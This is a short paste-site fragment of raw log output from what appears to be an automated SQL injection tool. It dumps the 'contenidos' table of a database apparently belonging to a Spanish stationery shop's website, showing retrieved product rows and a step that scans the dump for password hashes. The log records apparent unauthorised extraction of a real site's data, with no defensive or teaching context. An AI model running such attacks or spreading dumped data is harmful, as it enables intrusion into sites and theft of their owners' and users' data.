  295. [15:45:25] [INFO] retrieved: "P6","<p>Goma de pl&aacute;stico, ideal para borrar lapiz sobre toda clase de papel. Sobreenvueltas en celof...
  296. [15:45:33] [INFO] retrieved: " ","<p>BemoBemo</p>","176","2009-03-31 11:34:55","1"," "," ","2009-03-31"," "," "," ","21","test"," "
  297. [15:45:33] [INFO] analyzing table dump for possible password hashes
  298. Database: lapiz_lapiz
  299. Table: contenidos
  300. [112 entries]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement